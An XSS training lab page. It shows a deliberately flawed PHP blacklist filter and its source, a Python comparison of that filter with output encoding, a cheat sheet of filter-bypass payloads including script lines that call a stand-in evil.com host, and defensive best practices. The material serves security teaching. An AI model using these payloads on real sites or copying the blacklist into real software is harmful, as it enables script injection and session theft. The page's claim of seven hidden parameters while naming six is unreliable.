Advanced Bypass Prevention XSS Lab

Test XSS with comprehensive blacklist filtering that includes specific bypass attempt prevention

Bypass Prevention Challenge

Lab Overview

This lab demonstrates an advanced blacklist filtering approach that specifically targets common bypass techniques. The filter now includes prevention for string concatenation, HTML entities, and Unicode escapes for the "confirm" function.

Advanced Bypass Prevention: The blacklist now includes specific patterns that block common bypass techniques for the "confirm" function, making this a more challenging filter to evade.
Multiple Hidden Parameters: There are 7 hidden parameters (id, cat, page, number, page_id, categoryid) not shown in the main form. Use a parameter-discovery tool such as Arjun to find them all.
Parameter Security Levels:
  • Secure (fname, lname): uses htmlspecialchars()
  • Advanced Filter (7 parameters): bypass prevention included
  • Bypass Prevention: specific bypass patterns are blocked
  • Multiple Vectors: 7 parameters to test advanced techniques
Advanced Blacklist Filter Details:
  • Case variations blocked: script, Script, sCript, scRipt, scrIpt, scriPt, scripT, SCript, SCRipt, SCRIpt, SCRIPt, SCRIPT
  • Event handlers blocked: ontoggle, onmousemove, onmouseover, onfocus
  • Tags blocked: img, image, svg, details
  • JavaScript functions blocked: alert, confirm, prompt, eval
  • Specific bypass patterns blocked (matched as literal text):
      "c"+"onfirm(1)">
      confirm(1)>
      \u0063onfirm(1)>

These patterns specifically target common bypass techniques for the "confirm" function, including string concatenation, HTML entity encoding, and Unicode escapes.

Hidden parameters id, cat, page, number, page_id, categoryid: each uses the advanced bypass prevention filter.
Secure Parameters (fname, lname):
  Input:  <script>alert(1)</script>
  Output: &lt;script&gt;alert(1)&lt;/script&gt;
Advanced Blacklist Filtered:
  Input:  <script>"c"+"onfirm(1)"</script>
  Output: <>""+""</>
The same advanced blacklist filter with bypass prevention is consistently applied to all 7 hidden parameters, making this a very challenging test case.
Overall Security Level: High Security

Objective: Discover all 7 hidden parameters and find creative ways to bypass the advanced blacklist filtering with specific bypass prevention to execute XSS payloads.

Backend Source Code
// fname / lname: context-aware output encoding (the secure path)
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// id (and the other hidden parameters): blacklist removal, no encoding
elseif(isset($_GET["id"])){
    // str_replace() removes each entry in turn, in array order; 'details'
    // and 'script' appear twice, which is harmless. Nothing is encoded, so
    // every character that survives the removals is echoed raw.
    $arr = array('details','alert','confirm','prompt','eval','details',
                'ontoggle','onmousemove','onmouseover',
                'script','Script','sCript','scRipt','scrIpt','scriPt',
                'scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT',
                'script','img','image','svg','onfocus',
                '"c"+"onfirm(1)">', "confirm(1)>", "\u0063onfirm(1)>");
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
// Same filter applied to: cat, page, number, page_id, categoryid
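Added example, not the lab's own code: a Python re-implementation of the two output paths in the backend above, so the blacklist path and the htmlspecialchars() path can be compared offline on the page's own sample inputs. It assumes that PHP str_replace() with an array of search strings applies the removals one after another in array order, and that the double-quoted PHP entry "\u0063onfirm(1)>" is the literal text \u0063onfirm(1)> because PHP only decodes the braced \u{...} form.

```python
# Added example, not the lab's own code: the lab's two output paths in Python.
# Assumptions: PHP str_replace() with an array of search strings removes each
# entry in turn, in array order; htmlspecialchars(..., ENT_QUOTES) encodes
# & " ' < > as listed in _ENCODE; the PHP literal "\u0063onfirm(1)>" is the
# plain text \u0063onfirm(1)> because PHP only decodes the braced \u{...} form.

BLACKLIST = [
    'details', 'alert', 'confirm', 'prompt', 'eval', 'details',
    'ontoggle', 'onmousemove', 'onmouseover',
    'script', 'Script', 'sCript', 'scRipt', 'scrIpt', 'scriPt',
    'scripT', 'SCript', 'SCRipt', 'SCRIpt', 'SCRIPt', 'SCRIPT',
    'script', 'img', 'image', 'svg', 'onfocus',
    '"c"+"onfirm(1)">', 'confirm(1)>', '\\u0063onfirm(1)>',
]

# Entity table of htmlspecialchars() with ENT_QUOTES; '&' must come first so
# the entities produced by the later rows are not encoded a second time.
_ENCODE = [('&', '&amp;'), ('"', '&quot;'), ("'", '&#039;'),
           ('<', '&lt;'), ('>', '&gt;')]


def blacklist_filter(value: str) -> str:
    """Hidden-parameter path: str_replace($arr, '', $_GET['id']).
    Each search string sees the output of the ones before it, and whatever
    survives is echoed raw."""
    for needle in BLACKLIST:
        value = value.replace(needle, '')
    return value


def html_encode(value: str) -> str:
    """fname/lname path: htmlspecialchars($v, ENT_QUOTES). Nothing is removed;
    the characters that carry meaning in an HTML text context are encoded."""
    for ch, entity in _ENCODE:
        value = value.replace(ch, entity)
    return value


def leaves_markup(value: str) -> bool:
    """True if the output still contains raw angle brackets, i.e. the browser
    would parse it as HTML instead of rendering it as text."""
    return '<' in value or '>' in value


if __name__ == '__main__':
    # Sample inputs taken from the lab page above.
    for sample in ['<script>alert(1)</script>', '<script>"c"+"onfirm(1)"</script>']:
        for name, fn in (('blacklist', blacklist_filter), ('encoded', html_encode)):
            out = fn(sample)
            print(f'{name:9}: {out!r:45} markup left: {leaves_markup(out)}')
```

Note that the three "specific bypass pattern" entries end in `>`, so they only match when that character directly follows; on the second sample only the `script` tokens are removed, and the angle brackets survive on both samples, whereas the encoded path leaves no markup at all.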
Test Input Forms
Visible Parameters (HTML Encoded): fname and lname are encoded with htmlspecialchars()
Hidden Parameters (Advanced Bypass Prevention)
Hint: 7 parameters (id, cat, page, number, page_id, categoryid) are hidden but implemented with advanced bypass prevention; all of them use the same advanced filtering.
Advanced XSS Bypass Techniques for Bypass Prevention
Alternative Functions (Not Filtered):
  • <script>print()</script>
  • <script>open()</script>
  • <script>console.log(1)</script>
  • <script>fetch('http://evil.com')</script>
  • <script>XMLHttpRequest()</script>
  • <script>location.href='http://evil.com'</script>
Advanced String Manipulation:
  • <script>window['al'+'ert'](1)</script>
  • <script>this['al'+'ert'](1)</script>
  • <script>self['al'+'ert'](1)</script>
  • <script>top['al'+'ert'](1)</script>
  • <script>parent['al'+'ert'](1)</script>
Alternative Encoding Bypass:
  • <script>window['\x61lert'](1)</script>
  • <script>window['\141lert'](1)</script>
  • <script>window[`al${''}ert`](1)</script>
  • <script>window['al'['concat']('ert')](1)</script>
  • <script>window['al'.concat('ert')](1)</script>
Alternative Tags/Events (Not Filtered):
  • <iframe src=javascript:alert(1)>
  • <body onload=window['al'+'ert'](1)>
  • <marquee onstart=alert(1)></marquee>
  • <object data=javascript:alert(1)>
  • <embed src=javascript:alert(1)>
Advanced Bypass Prevention Analysis:

The current filter is very comprehensive but still has some limitations:

  • Bypass patterns: Blocks specific patterns but not all variations
  • Alternative functions: Many JavaScript functions not in the blacklist
  • String manipulation: Some concatenation patterns still work
  • Character encoding: Some encoding variations not covered
  • Global objects: Multiple ways to access functions via objects
  • Alternative tags/events: Many HTML elements not blocked
Advanced Bypass Strategies:
  • Use alternative JavaScript functions not in the blacklist
  • Use different string concatenation patterns
  • Use alternative character encoding methods
  • Use global objects to access blocked functions
  • Use HTML tags and events not in the blacklist
  • Use template literals or other string manipulation
  • Use different encoding combinations
Security Implications

Advanced bypass prevention demonstrates:

  • Even sophisticated blacklists have limitations
  • Attackers can always find creative bypass methods
  • Multiple attack vectors provide redundancy
  • New JavaScript features constantly expand attack surface
  • Browser updates may introduce new bypass techniques
  • Whitelist approaches remain the only truly secure method
  • Context-aware encoding is essential for security
Best Practices

For truly secure web applications:

  • Use context-aware output encoding instead of blacklists
  • Implement strict Content Security Policy (CSP) headers
  • Validate input based on expected data types and patterns
  • Use security libraries/frameworks for output encoding
  • Test all parameters with advanced bypass techniques
  • Apply consistent security controls across all parameters
  • Assume any blacklist can and will be bypassed
  • Regularly update security controls as new threats emerge
Real-World Security Implications
Common Advanced Filter Scenarios:
  • Enterprise WAFs: Often use sophisticated but bypassable filters
  • Security plugins: May implement advanced but incomplete protection
  • Custom frameworks: Often accumulate filters without proper testing
  • Legacy applications: May have complex but flawed filtering logic
Impact of Advanced Filter Bypass:
  • Complete application compromise despite advanced filtering
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Phishing attacks from within the application
  • Data exfiltration and privacy breaches
  • Reputation damage and legal consequences
Advanced Prevention Strategies:
  • Context-aware encoding: Use proper encoding for each output context
  • Input validation: Validate based on expected data types and patterns
  • Content Security Policy: Implement strict CSP headers
  • Security testing: Test all parameters with advanced bypass techniques
  • Parameter discovery: Use tools to find all parameters during testing
  • Security headers: Implement X-XSS-Protection, X-Content-Type-Options
  • Regular updates: Keep security controls updated with new threats